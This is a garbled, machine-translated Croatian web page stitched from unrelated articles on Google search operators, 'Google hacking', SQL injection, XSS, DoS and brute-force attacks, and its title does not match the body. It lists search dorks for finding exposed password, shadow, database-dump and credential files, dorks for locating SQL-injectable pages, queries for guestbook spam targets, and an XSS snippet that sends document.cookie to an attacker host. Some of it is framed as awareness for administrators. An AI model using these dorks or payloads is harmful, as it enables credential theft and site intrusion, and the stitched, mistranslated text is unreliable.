Kako postaviti pametne telefone i računala. Informativni portal
  • Dom
  • Programi
  • Inurl php igra imena priče. Upute za korištenje jSQL Injection - višenamjenskog alata za pretraživanje i iskorištavanje SQL injekcija u Kali Linuxu

Inurl php igra imena priče. Upute za korištenje jSQL Injection - višenamjenskog alata za pretraživanje i iskorištavanje SQL injekcija u Kali Linuxu

Kako ispravno pretraživati ​​pomoću google.com

Svatko vjerojatno zna kako koristiti tražilicu poput Googlea =) Ali ne znaju svi da ako ispravno sastavite upit za pretraživanje pomoću posebnih konstrukcija, možete postići rezultate onoga što tražite mnogo učinkovitije i brže =) U ovom članku Pokušat ću pokazati to i što trebate učiniti da biste ispravno pretraživali

Google podržava nekoliko naprednih operatora pretraživanja koji imaju posebno značenje prilikom pretraživanja na google.com. Obično te izjave mijenjaju pretraživanje ili čak govore Googleu da izvrši potpuno različite vrste pretraživanja. Na primjer, veza: konstrukcija je poseban operator, a zahtjev poveznica: www.google.com neće vam ponuditi normalno pretraživanje, već će umjesto toga pronaći sve web stranice koje imaju veze na google.com.
alternativne vrste zahtjeva

predmemorija: ako uključite druge riječi u upit, Google će istaknuti te uključene riječi unutar predmemoriranog dokumenta.
Na primjer, cache:www.web stranicaće prikazati sadržaj u predmemoriji s istaknutom riječi "web".

veza: Gornji upit za pretraživanje prikazat će web stranice koje sadrže veze na navedeni upit.
Na primjer: poveznica: www.site prikazat će sve stranice koje imaju vezu na http://www.site

povezano: Prikazuje web stranice koje su "povezane" s navedenom web stranicom.
Na primjer, povezano: www.google.com izlistat će web stranice koje su slične Googleovoj početnoj stranici.

info: Zatraži informacije: predstavit će neke informacije koje Google ima o web stranici koju tražite.
Na primjer, info: web stranica pokazat će informacije o našem forumu =) (Armada - Forum za odrasle webmastere).

Ostali zahtjevi za informacijama

definiraj: upit definiraj: pružit će definiciju riječi koje uneseš iza njega, prikupljenih iz različitih izvora na mreži. Definicija će biti za cijelu unesenu frazu (to jest, uključit će sve riječi u točnom upitu).

dionice: Ako započnete upit s dionicama: Google će ostatak upita obraditi kao simbole dionica i povezati se na stranicu koja prikazuje gotove informacije za te simbole.
Na primjer, dionice:Intel yahoo pokazat će informacije o Intelu i Yahoou. (Imajte na umu da biste trebali upisati simbole udarnih vijesti, a ne naziv tvrtke)

Modifikatori upita

site: Ako uključite site: u svoj upit, Google će ograničiti rezultate na one web stranice koje pronađe u toj domeni.
Također možete pretraživati ​​po pojedinačnim zonama, kao što su ru, org, com itd. ( web mjesto:com web mjesto: ru)

allintitle: Ako pokrenete upit s allintitle:, Google će ograničiti rezultate na sve riječi upita u naslovu.
Na primjer, allintitle: google pretragaće vratiti sve Google stranice pretraživanjem kao što su slike, blog itd

intitle: Ako uključite intitle: u svoj upit, Google će ograničiti rezultate na dokumente koji sadrže tu riječ u naslovu.
Na primjer, naslov: Posao

allinurl: Ako pokrenete upit s allinurl: Google će ograničiti rezultate na sve riječi upita u URL-u.
Na primjer, allinurl: google pretraživanje vratit će dokumente s googleom i pretraživati ​​u naslovu. Također, kao opciju, riječi možete odvojiti kosom crtom (/) tada će se riječi s obje strane kose crte pretraživati ​​unutar iste stranice: Primjer allinurl: foo/bar

inurl: Ako uključite inurl: u svoj upit, Google će ograničiti rezultate na dokumente koji sadrže tu riječ u URL-u.
Na primjer, Animacija inurl:site

intext: pretražuje samo navedenu riječ u tekstu stranice, zanemarujući naslov i tekstove veza, i druge stvari koje nisu povezane s. Postoji i izvedenica ovog modifikatora - allintext: i.e. dalje će se sve riječi u upitu pretraživati ​​samo u tekstu, što također može biti važno, zanemarujući često korištene riječi u poveznicama
Na primjer, intext:forum

daterange: pretražuje unutar vremenskog okvira (daterange:2452389-2452389), datumi za vremena su u julijanskom formatu.

Pa, i svakakvih zanimljivih primjera upita

Primjeri pisanja upita za Google. Za spamere

Inurl:control.guest?a=sign

Site:books.dreambook.com “URL početne stranice” “Potpiši moj” inurl:znak

Web stranica: www.freegb.net Početna stranica

Inurl:sign.asp “Broj znakova”

“Poruka:” inurl:sign.cfm “Pošiljatelj:”

Inurl:register.php “Registracija korisnika” “Web stranica”

Inurl:edu/guestbook “Upišite se u knjigu gostiju”

Inurl:post “Objavi komentar” “URL”

Inurl:/archives/ “Komentari:” “Sjećate li se informacija?”

“Skriptu i knjigu gostiju izradio:” “URL:” “Komentari:”

Inurl:?action=add “phpBook” “URL”

Naslov: "Pošalji novu priču"

Časopisi

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Knjiga gostiju"

blogovi

Inurl:blogger.com/comment.g?”postID””anonymous”

Inurl:typepad.com/ “Objavi komentar” “Sjećaš li se osobnih podataka?”

Inurl:greatestjournal.com/community/ “Objavi komentar” “adrese anonimnih postera”

“Objavi komentar” “adrese anonimnih postera” -

Naslov: "Objavi komentar"

Inurl:pirillo.com “Objavi komentar”

Forumi

Inurl:gate.html?”name=Forumi” “mode=odgovor”

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:”members.html”

Inurl:forum/memberlist.php?"

Hakiranje s Googleom

Aleksandar Antipov

Google tražilica (www.google.com) nudi mnoge mogućnosti pretraživanja. Sve ove značajke neprocjenjiv su alat za pretraživanje za korisnika koji je tek na Internetu, au isto vrijeme još moćnije oružje invazije i uništenja u rukama ljudi sa zlim namjerama, uključujući ne samo hakere, već i ne-računalne kriminalce i čak i teroristi.
(9475 pregleda u 1 tjednu)


Denis Barankov
denisNOSPAMixi.ru

Pažnja: Ovaj članak nije vodič za djelovanje. Ovaj članak je napisan za vas, administratore WEB poslužitelja, kako biste izgubili lažni osjećaj da ste sigurni i konačno shvatili podmuklost ovakvog načina dobivanja informacija i prihvatili se zaštite svoje stranice.

Uvod

Na primjer, pronašao sam 1670 stranica za 0,14 sekundi!

2. Unesite drugi redak, na primjer:

inurl:"auth_user_file.txt"

malo manje, ali to je već dovoljno za besplatno preuzimanje i pogađanje lozinke (koristeći istog Johna The Rippera). U nastavku ću navesti još nekoliko primjera.

Dakle, morate shvatiti da je tražilica Google posjetila većinu internetskih stranica i pohranila informacije sadržane na njima. Ove predmemorirane informacije omogućuju vam da dobijete informacije o web-mjestu i sadržaju web-mjesta bez izravnog povezivanja s web-mjestom, samo udubljivanjem u informacije koje su pohranjene unutar Googlea. Štoviše, ako informacije na web-mjestu više nisu dostupne, informacije u predmemoriji još uvijek mogu biti sačuvane. Sve što trebate za ovu metodu je znati neke Google ključne riječi. Ova tehnika se zove Google hakiranje.

Informacije o Google hakiranju prvi put su se pojavile na Bugtruck mailing listi prije 3 godine. Godine 2001. ovu je temu pokrenuo francuski student. Ovdje je poveznica na ovo pismo http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Pruža prve primjere takvih upita:

1) Indeks /admin
2) Indeks /lozinke
3) Indeks /mail
4) Indeks / +banques +filetype:xls (za Francusku...)
5) Indeks / +passwd
6) Indeks / password.txt

Ova je tema nedavno uzburkala engleski čitateljski dio interneta: nakon članka Johnnyja Longa, objavljenog 7. svibnja 2004. Za potpunije proučavanje Google hakiranja savjetujem vam da posjetite web stranicu ovog autora http://johnny.ihackstuff.com. U ovom članku samo vas želim upoznati s novostima.

Tko ovo može koristiti:
- Novinari, špijuni i svi oni koji vole zabadati nos u tuđe poslove mogu to iskoristiti za traženje inkriminirajućih dokaza.
- Hakeri koji traže pogodne mete za hakiranje.

Kako Google radi.

Za nastavak razgovora, podsjetit ću vas na neke od ključnih riječi koje se koriste u Google upitima.

Pretražujte pomoću znaka +

Google iz pretraživanja isključuje riječi koje smatra nevažnima. Na primjer, upitne riječi, prijedlozi i članovi u engleskom jeziku: na primjer are, of, where. Na ruskom, čini se da Google sve riječi smatra važnima. Ako je riječ isključena iz pretraživanja, Google piše o tome. Kako bi Google počeo tražiti stranice s ovim riječima, morate dodati znak + bez razmaka prije riječi. Na primjer:

as +baze

Traži pomoću znaka –

Ako Google pronađe velik broj stranica s kojih treba isključiti stranice s određenom temom, tada možete natjerati Google da traži samo stranice koje ne sadrže određene riječi. Da biste to učinili, morate naznačiti ove riječi stavljanjem znaka ispred svake - bez razmaka ispred riječi. Na primjer:

ribolov - votka

Pretraživanje pomoću ~

Možda želite pretraživati ​​ne samo navedenu riječ, već i njezine sinonime. Da biste to učinili, ispred riječi stavite simbol ~.

Pronalaženje točne fraze pomoću dvostrukih navodnika

Google pretražuje na svakoj stranici sva pojavljivanja riječi koje ste napisali u nizu upita i ne mari za relativni položaj riječi, sve dok se sve navedene riječi nalaze na stranici u isto vrijeme (ovo je zadana radnja). Da biste pronašli točnu frazu, morate je staviti u navodnike. Na primjer:

"podupirač za knjige"

Da biste imali barem jednu od navedenih riječi, morate eksplicitno navesti logičku operaciju: OR. Na primjer:

sigurnost knjige ILI zaštita

Osim toga, možete upotrijebiti znak * u traci za pretraživanje da označite bilo koju riječ i. predstavljati bilo koji lik.

Traženje riječi pomoću dodatnih operatora

Postoje operatori pretraživanja koji su navedeni u nizu pretraživanja u formatu:

operator:traži_pojam

Razmaci pored dvotočke nisu potrebni. Ako umetnete razmak iza dvotočke, vidjet ćete poruku o pogrešci, a prije nje Google će ih koristiti kao uobičajeni niz za pretraživanje.
Postoje grupe dodatnih operatora pretraživanja: jezici - naznačite na kojem jeziku želite vidjeti rezultat, datum - ograničite rezultate za zadnja tri, šest ili 12 mjeseci, pojave - naznačite gdje u dokumentu trebate tražiti redak: posvuda, u naslovu, u URL-u, domene - pretražite na određenom web-mjestu ili ga, obrnuto, isključite iz pretraživanja; sigurno pretraživanje - blokira web-mjesta koja sadrže određenu vrstu informacija i uklanja ih sa stranica rezultata pretraživanja.
Istodobno, neki operatori ne zahtijevaju dodatni parametar, na primjer, zahtjev "cache:www.google.com" može se nazvati kao punopravni niz za pretraživanje, a neke ključne riječi, naprotiv, zahtijevaju pretraživanje riječ, na primjer "site:www. google.com pomoć ". U svjetlu naše teme, pogledajmo sljedeće operatore:

Operater

Opis

Zahtijeva li dodatni parametar?

pretraži samo na stranici navedenoj u search_term

traži samo u dokumentima s tipom search_term

pronaći stranice koje sadrže search_term u naslovu

pronaći stranice koje sadrže sve riječi search_term u naslovu

pronaći stranice koje sadrže riječ search_term u svojoj adresi

pronaći stranice koje sadrže sve riječi search_term u svojoj adresi

Operator web mjesta: ograničava pretraživanje samo na navedeno mjesto, a možete navesti ne samo naziv domene, već i IP adresu. Na primjer, unesite:

operator vrste datoteke: Ograničava pretragu na određenu vrstu datoteke. Na primjer:

Od datuma objave članka, Google može pretraživati ​​unutar 13 različitih formata datoteka:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Format obogaćenog teksta (rtf)
  • Shockwave Flash (swf)
  • Tekst (ans, txt)

Operator veze: Prikazuje sve stranice koje upućuju na navedenu stranicu.
Vjerojatno je uvijek zanimljivo vidjeti koliko mjesta na Internetu zna za vas. Pokušajmo:

Operator predmemorije: Prikazuje verziju web-mjesta u Googleovoj predmemoriji kako je izgledala zadnji put kada je Google posjetio tu stranicu. Uzmimo bilo koje mjesto koje se često mijenja i pogledajmo:

intitle operator: Traži određenu riječ u naslovu stranice. Operator allintitle: je proširenje - traži sve navedene više riječi u naslovu stranice. Usporedi:

naslov:let na Mars
intitle:let intitle:on intitle:mars
allintitle:let na mars

Operator inurl: uzrokuje da Google prikaže sve stranice koje sadrže navedeni niz u URL-u. allinurl operator: traži sve riječi u URL-u. Na primjer:

allinurl:acid acid_stat_alerts.php

Ova naredba je posebno korisna za one koji nemaju SNORT - barem mogu vidjeti kako radi na stvarnom sustavu.

Metode hakiranja pomoću Googlea

Dakle, saznali smo da korištenjem kombinacije gore navedenih operatora i ključnih riječi svatko može prikupiti potrebne informacije i tražiti ranjivosti. Te se tehnike često nazivaju Google hakiranje.

Karta stranice

Možete koristiti site: operator za popis svih veza koje je Google pronašao na web mjestu. Tipično, stranice koje su dinamički stvorene skriptama nisu indeksirane pomoću parametara, pa neke stranice koriste ISAPI filtre tako da veze nisu u obliku /article.asp?num=10&dst=5 , već s kosim crtama /article/abc/num/ 10/dst/5. To se radi kako bi tražilice generalno indeksirale stranicu.

Pokušajmo:

web mjesto:www.whitehouse.gov bijela kuća

Google misli da svaka stranica na web stranici sadrži riječ whitehouse. To je ono što koristimo za dobivanje svih stranica.
Postoji i pojednostavljena verzija:

web mjesto:whitehouse.gov

A najbolji dio je što drugovi iz whitehouse.gov nisu ni znali da smo pogledali strukturu njihove stranice, pa čak i predmemorirane stranice koje je Google preuzeo. Ovo se može koristiti za proučavanje strukture web-mjesta i pregled sadržaja, ostajući zasad neotkriveni.

Pregledajte popis datoteka u direktorijima

WEB poslužitelji mogu prikazati popise direktorija poslužitelja umjesto uobičajenih HTML stranica. To se obično radi kako bi se osiguralo da korisnici odaberu i preuzmu određene datoteke. Međutim, u mnogim slučajevima administratori nemaju namjeru prikazati sadržaj imenika. To se događa zbog neispravne konfiguracije poslužitelja ili nepostojanja glavne stranice u imeniku. Kao rezultat toga, haker ima priliku pronaći nešto zanimljivo u imeniku i iskoristiti to za vlastite svrhe. Da biste pronašli sve takve stranice, dovoljno je primijetiti da sve sadrže riječi: indeks od. Ali budući da indeks riječi ne sadrži samo takve stranice, moramo pročistiti upit i uzeti u obzir ključne riječi na samoj stranici, tako da upiti poput:

intitle:index.of nadređenog imenika
intitle:index.od veličina imena

Budući da je većina popisa imenika namjerna, možda će vam biti teško prvi put pronaći pogrešno postavljene popise. Ali barem već možete koristiti popise za određivanje verzije WEB poslužitelja, kao što je opisano u nastavku.

Dobivanje verzije WEB poslužitelja.

Poznavanje verzije WEB poslužitelja uvijek je korisno prije pokretanja bilo kakvog hakerskog napada. Opet, zahvaljujući Googleu, možete dobiti ove informacije bez povezivanja na poslužitelj. Ako pažljivo pogledate popis imenika, možete vidjeti da su tamo prikazani naziv WEB poslužitelja i njegova verzija.

Apache1.3.29 - ProXad poslužitelj na trf296.free.fr priključak 80

Iskusni administrator može promijeniti ove podatke, ali, u pravilu, oni su istiniti. Dakle, za dobivanje ove informacije dovoljno je poslati zahtjev:

intitle:index.of server.at

Da bismo dobili informacije za određeni poslužitelj, razjašnjavamo zahtjev:

intitle:index.of server.at site:ibm.com

Ili obrnuto, tražimo poslužitelje koji pokreću određenu verziju poslužitelja:

intitle:index.of Apache/2.0.40 poslužitelj na

Ovu tehniku ​​haker može koristiti da pronađe žrtvu. Ako, na primjer, ima exploit za određenu verziju WEB poslužitelja, onda ga može pronaći i isprobati postojeći exploit.

Verziju poslužitelja možete dobiti i pregledom stranica koje su zadano instalirane prilikom instalacije najnovije verzije WEB poslužitelja. Na primjer, da biste vidjeli testnu stranicu Apache 1.2.6, samo upišite

intitle:Test.Page.for.Apache to.radi!

Štoviše, neki operativni sustavi odmah instaliraju i pokreću WEB poslužitelj tijekom instalacije. Međutim, neki korisnici toga nisu ni svjesni. Naravno, ako vidite da netko nije uklonio zadanu stranicu, onda je logično pretpostaviti da računalo uopće nije bilo podvrgnuto prilagodbi i da je vjerojatno ranjivo na napad.

Pokušajte pretražiti IIS 5.0 stranice

allintitle:Dobro došli u Windows 2000 Internet usluge

U slučaju IIS-a, možete odrediti ne samo verziju poslužitelja, već i verziju sustava Windows i servisni paket.

Drugi način za određivanje verzije WEB poslužitelja je traženje priručnika (stranica pomoći) i primjera koji mogu biti instalirani na stranici prema zadanim postavkama. Hakeri su pronašli dosta načina za korištenje ovih komponenti za dobivanje privilegiranog pristupa web mjestu. Zato ove komponente morate ukloniti na mjestu proizvodnje. Da ne spominjemo činjenicu da se prisutnost ovih komponenti može koristiti za dobivanje informacija o vrsti poslužitelja i njegovoj verziji. Na primjer, pronađimo priručnik za apache:

inurl:ručni moduli apache direktiva

Korištenje Googlea kao CGI skenera.

CGI skener ili WEB skener je pomoćni program za traženje ranjivih skripti i programa na poslužitelju žrtve. Ovi uslužni programi moraju znati što tražiti, za to imaju cijeli popis ranjivih datoteka, na primjer:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/skripte/cphost.dll
/cgi-bin/finger.cgi

Svaku od ovih datoteka možemo pronaći pomoću Googlea, dodatno koristeći riječi index ili inurl s nazivom datoteke u traci za pretraživanje: možemo pronaći stranice s ranjivim skriptama, na primjer:

allinurl:/random_banner/index.cgi

Koristeći dodatno znanje, haker može iskoristiti ranjivost skripte i upotrijebiti tu ranjivost da natjera skriptu da emitira bilo koju datoteku pohranjenu na poslužitelju. Na primjer, datoteka zaporke.

Kako se zaštititi od Google hakiranja. 1. Ne objavljujte važne podatke na WEB poslužitelju.

Čak i ako ste podatke objavili privremeno, možete zaboraviti na njih ili će netko imati vremena pronaći i uzeti te podatke prije nego što ih izbrišete. nemoj to raditi Postoje mnogi drugi načini prijenosa podataka koji ih štite od krađe.

2. Provjerite svoju stranicu.

Koristite opisane metode za istraživanje svoje stranice. Povremeno provjeravajte svoje web mjesto za nove metode koje se pojavljuju na web mjestu http://johnny.ihackstuff.com. Ne zaboravite da ako želite automatizirati svoje radnje, morate dobiti posebno dopuštenje od Googlea. Ako pažljivo čitate http://www.google.com/terms_of_service.html, tada ćete vidjeti izraz: Ne smijete slati automatizirane upite bilo koje vrste Googleovom sustavu bez prethodnog izričitog dopuštenja Googlea.

3. Možda vam Google neće trebati za indeksiranje vaše stranice ili njenog dijela.

Google vam dopušta uklanjanje veze na vašu stranicu ili njezin dio iz svoje baze podataka, kao i uklanjanje stranica iz predmemorije. Osim toga, možete zabraniti pretraživanje slika na vašoj stranici, zabraniti prikazivanje kratkih fragmenata stranica u rezultatima pretraživanja. Sve mogućnosti za brisanje stranice opisane su na stranici http://www.google.com/remove.html. Da biste to učinili, morate potvrditi da ste stvarno vlasnik ove stranice ili umetnuti oznake na stranicu ili

4. Koristite robots.txt

Poznato je da tražilice gledaju datoteku robots.txt koja se nalazi u korijenu stranice i ne indeksiraju one dijelove koji su označeni riječju Disallow. Ovo možete koristiti kako biste spriječili indeksiranje dijela stranice. Na primjer, kako biste spriječili indeksiranje cijele stranice, izradite datoteku robots.txt koja sadrži dva retka:

Korisnički agent: *
Zabrani: /

Što se još događa

Kako vam život ne bi izgledao kao med, reći ću na kraju da postoje stranice koje prate one ljude koji, koristeći gore navedene metode, traže rupe u skriptama i WEB poslužiteljima. Primjer takve stranice je

Primjena.

Malo slatko. Pokušajte sami nešto od sljedećeg:

1. #mysql dump filetype:sql - traženje dumpova mySQL baze podataka
2. Sažeto izvješće o ranjivosti glavnog računala - pokazat će vam koje su ranjivosti drugi ljudi pronašli
3. phpMyAdmin radi na inurl:main.php - ovo će prisiliti kontrolu da se zatvori kroz phpmyadmin panel
4. nije za distribuciju povjerljivo
5. Varijable poslužitelja kontrolnog stabla pojedinosti zahtjeva
6. Trčanje u dječjem načinu rada
7. Ovo izvješće generirao je WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – možda nekome trebaju konfiguracijske datoteke vatrozida? :)
10. intitle:index.of finances.xls – hmm....
11. intitle: Indeks dbconvert.exe razgovora – icq zapisnici razgovora
12.intext:Tobias Oetiker analiza prometa
13. intitle: Statistika korištenja za Genered by Webalizer
14. intitle: statistika napredne web statistike
15. intitle:index.of ws_ftp.ini – ws ftp konfiguracija
16. inurl:ipsec.secrets čuva zajedničke tajne - tajni ključ - dobar nalaz
17. inurl:main.php Dobro došli u phpMyAdmin
18. inurl:server-info Informacije o Apache poslužitelju
19. site:edu admin ocjene
20. ORA-00921: neočekivani kraj SQL naredbe – dobivanje staza
21. intitle:index.of trillian.ini
22. naslov:Kazalo pwd.db
23.naslov:indeks.ljudi.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle: Indeks .mysql_history
27. intitle:index of intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30.intitle:index.ofsecring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:izvedi filetype:ini

  • "Hakiranje s Googleom"
  • Centar za obuku "Informzashita" http://www.itsecurity.ru - vodeći specijalizirani centar u području obuke o informacijskoj sigurnosti (Licenca Moskovskog odbora za obrazovanje br. 015470, državna akreditacija br. 004251). Jedini ovlašteni centar za obuku za Internet Security Systems i Clearswift u Rusiji i zemljama ZND-a. Microsoftov ovlašteni centar za obuku (Sigurnosna specijalizacija). Programi obuke su usklađeni s Državnom tehničkom komisijom Rusije, FSB (FAPSI). Potvrde o obuci i državne isprave o usavršavanju.

    SoftKey je jedinstvena usluga za kupce, programere, trgovce i pridružene partnere. Osim toga, ovo je jedna od najboljih internetskih trgovina softverom u Rusiji, Ukrajini, Kazahstanu, koja kupcima nudi široku paletu proizvoda, mnogo načina plaćanja, brzu (često trenutnu) obradu narudžbi, praćenje procesa narudžbe u osobnom odjeljku, razne popusti iz trgovine i proizvođača BY.

    Odlučio sam malo progovoriti o informacijskoj sigurnosti. Članak će biti koristan programerima početnicima i onima koji su se tek počeli baviti razvojem Frontenda. U čemu je problem?

    Mnogi programeri početnici toliko se zanesu pisanjem koda da potpuno zaborave na sigurnost svog rada. I što je najvažnije, zaboravljaju na takve ranjivosti kao što su SQL i XXS upiti. Oni također smišljaju jednostavne lozinke za svoje administrativne ploče i podvrgnuti su brutalnoj sili. Koji su to napadi i kako ih možete izbjeći?

    SQL injekcija

    SQL injection je najčešći tip napada na bazu podataka, koji se provodi tijekom SQL upita za određeni DBMS. Mnogi ljudi pa čak i velike tvrtke pate od takvih napada. Razlog je pogreška programera prilikom pisanja baze podataka i, strogo govoreći, SQL upita.

    Napad SQL injekcijom moguć je zbog neispravne obrade ulaznih podataka korištenih u SQL upitima. Ako je hakerski napad uspješan, riskirate gubitak ne samo sadržaja baza podataka, već i lozinki i zapisnika administrativne ploče. I ti će podaci biti sasvim dovoljni da u potpunosti preuzmu web mjesto ili da na njemu izvrše nepovratne prilagodbe.

    Napad se može uspješno reproducirati u skriptama napisanim u PHP-u, ASP-u, Perlu i drugim jezicima. Uspjeh takvih napada više ovisi o tome koji se DBMS koristi i kako je sama skripta implementirana. U svijetu postoje mnoga ranjiva mjesta za SQL injekcije. To je lako provjeriti. Samo unesite "dorks" - ovo su posebni upiti za traženje ranjivih stranica. Ovo su neki od njih:

    • inurl:index.php?id=
    • inurl:treneri.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:igre.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    Kako ih koristiti? Samo ih unesite u Google ili Yandex tražilicu. Tražilica će vam dati ne samo ranjivu stranicu, već i stranicu o toj ranjivosti. Ali nećemo tu stati i pobrinuti se da je stranica stvarno ranjiva. Da biste to učinili, dovoljno je staviti jedan navodnik “‘ nakon vrijednosti “id=1”. Nešto kao ovo:

    • inurl:igre.php?id=1’

    A stranica će nam dati pogrešku o SQL upitu. Što našem hakeru sljedeće treba?

    A onda mu treba upravo ovaj link na stranicu s pogreškom. Tada se rad na ranjivosti u većini slučajeva odvija u distribuciji "Kali linux" sa svojim pomoćnim programima za ovaj dio: uvođenje koda za ubrizgavanje i izvođenje potrebnih operacija. Kako će se to dogoditi, ne mogu vam reći. Ali o tome možete pronaći informacije na internetu.

    XSS napad

    Ova vrsta napada provodi se na datoteke kolačića. Korisnici ih pak vole spremati. Zašto ne? Što bismo bez njih? Uostalom, zahvaljujući kolačićima, ne moramo unositi lozinku za Vk.com ili Mail.ru sto puta. A malo je onih koji ih odbijaju. Ali na internetu se često pojavljuje pravilo za hakere: koeficijent pogodnosti izravno je proporcionalan koeficijentu nesigurnosti.

    Za provedbu XSS napada našem hakeru je potrebno poznavanje JavaScripta. Na prvi pogled, jezik je vrlo jednostavan i bezopasan, jer nema pristup računalnim resursima. Haker može raditi samo s JavaScriptom u pregledniku, ali to je dovoljno. Uostalom, glavna stvar je unijeti kod na web stranicu.

    Neću detaljno govoriti o procesu napada. Reći ću vam samo osnove i značenje kako se to događa.

    Haker može dodati JS kod na neki forum ili knjigu gostiju:

    document.location.href =”http://192.168.1.7/sniff.php?test”

    Skripte će nas preusmjeriti na zaraženu stranicu, gdje će se izvršiti kod: bio to sniffer, neka vrsta pohrane ili exploit, koji će na neki način ukrasti naše kolačiće iz predmemorije.

    Zašto JavaScript? Budući da je JavaScript izvrstan u obradi web zahtjeva i ima pristup kolačićima. Ali ako nas naša skripta odvede na neku stranicu, korisnik će to lako primijetiti. Ovdje haker koristi lukaviju opciju - jednostavno unosi kod u sliku.

    Img=nova slika();

    Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

    Jednostavno kreiramo sliku i dodijelimo joj našu skriptu kao adresu.

    Kako se zaštititi od svega toga? Vrlo je jednostavno - ne klikajte na sumnjive poveznice.

    DoS i DDos napadi

    DoS (od engleskog Denial of Service - denial of service) je hakerski napad na računalni sustav s ciljem izazivanja njegovog kvara. To je stvaranje uvjeta u kojima dobrovjerni korisnici sustava ne mogu pristupiti dostavljenim resursima sustava (poslužiteljima) ili je taj pristup otežan. Kvar sustava također može biti korak prema njegovom preuzimanju ako, u hitnoj situaciji, softver proizvede bilo kakvu kritičnu informaciju: na primjer, verziju, dio programskog koda itd. Ali najčešće je to mjera ekonomskog pritiska: gubitak jednostavne usluge koja stvara prihod. Računi od provajdera ili mjere za izbjegavanje napada značajno pogađaju “cilj” u džepu.Trenutno su najpopularniji DoS i DDoS napadi koji dopuštaju da gotovo svaki sustav zakaže bez ostavljanja pravno značajnih dokaza.

    Koja je razlika između DoS i DDos napada?

    DoS je napad osmišljen na pametan način. Na primjer, ako poslužitelj ne provjerava ispravnost dolaznih paketa, tada haker može uputiti zahtjev čija će obrada trajati vječno, a procesor neće imati dovoljno vremena za rad s drugim vezama. Sukladno tome, klijentima će biti uskraćena usluga. Ali na ovaj način neće biti moguće preopteretiti ili onemogućiti velike poznate stranice. Naoružani su prilično širokim kanalima i super moćnim poslužiteljima koji se bez problema mogu nositi s takvim preopterećenjem.

    DDoS je zapravo isti napad kao i DoS. Ali ako u DoS-u postoji jedan paket zahtjeva, tada ih u DDoS-u može biti stotine ili više. Čak se i super-snažni poslužitelji možda neće moći nositi s takvim preopterećenjem. Dat ću vam primjer.

    DoS napad je kada s nekim razgovarate, ali onda vam priđe neka neodgojena osoba i počne glasno vikati. Ili je nemoguće ili jako teško razgovarati. Rješenje: pozvati osiguranje koje će smiriti i udaljiti osobu iz objekta. DDoS napadi su kada uleti gomila od tisuća takvih neodgojenih ljudi. U tom slučaju osiguranje neće moći sve svezati i odvesti.

    DoS i DDoS provode se s računala, tzv. zombija. To su računala korisnika hakirana od strane hakera koji niti ne slute da njihov stroj sudjeluje u napadu na bilo koji server.

    Kako se zaštititi od ovoga? Općenito, nema šanse. Ali hakeru možete otežati stvari. Da biste to učinili, trebate odabrati dobar hosting s moćnim poslužiteljima.

    Bruteforce napad

    Programer može osmisliti puno sustava zaštite od napada, u potpunosti pregledati skripte koje smo napisali, provjeriti ima li na web-mjestu ranjivosti itd. Ali kada dođe do zadnjeg koraka izgleda web stranice, naime kada jednostavno postavi lozinku za administratorsku ploču, može zaboraviti jednu stvar. Lozinka!

    Strogo se ne preporučuje postavljanje jednostavne lozinke. To može biti 12345, 1114457, vasya111, itd. Ne preporučuje se postavljanje lozinki kraćih od 10-11 znakova. U protivnom biste mogli biti podvrgnuti najčešćem i nekompliciranom napadu - Brute force.

    Gruba sila napad je pretraživanjem lozinke iz rječnika pomoću posebnih programa. Rječnici mogu biti različiti: latinski, nabrajanje brojevima, recimo do određenog raspona, mješoviti (latinica + brojevi), a postoje čak i rječnici s jedinstvenim znakovima @#4$%&*~~`’”\ ? itd.

    Naravno, ovu vrstu napada je lako izbjeći. Sve što trebate učiniti je smisliti složenu lozinku. Čak vas i captcha može spasiti. Također, ako je vaša stranica napravljena na CMS-u, onda mnogi od njih otkriju ovu vrstu napada i blokiraju IP. Uvijek morate imati na umu da što je više različitih znakova u lozinci, to ju je teže pogoditi.

    Kako rade hakeri? U većini slučajeva ili sumnjaju ili znaju dio lozinke unaprijed. Sasvim je logično pretpostaviti da se korisnička lozinka sigurno neće sastojati od 3 ili 5 znakova. Takve lozinke dovode do čestih hakiranja. U osnovi, hakeri uzimaju raspon od 5 do 10 znakova i dodaju nekoliko znakova koje možda znaju unaprijed. Zatim se generiraju lozinke sa potrebnim rasponima. Kali Linux distribucija ima čak i programe za takve slučajeve. I voila, napad više neće dugo trajati, budući da volumen rječnika više nije tako velik. Osim toga, haker može koristiti snagu video kartice. Neki od njih podržavaju CUDA sustav, a brzina pretraživanja povećava se i do 10 puta. A sada vidimo da je napad na tako jednostavan način sasvim stvaran. Ali nisu samo web stranice podložne gruboj sili.

    Dragi programeri, nikada ne zaboravite na sustav informacijske sigurnosti, jer danas mnogi ljudi, uključujući i države, trpe takve vrste napada. Uostalom, najveća ranjivost je osoba kojoj se uvijek može negdje skrenuti pažnja ili nešto propustiti. Mi smo programeri, ali ne i programirani strojevi. Budite uvijek na oprezu, jer gubitak informacija može imati ozbiljne posljedice!

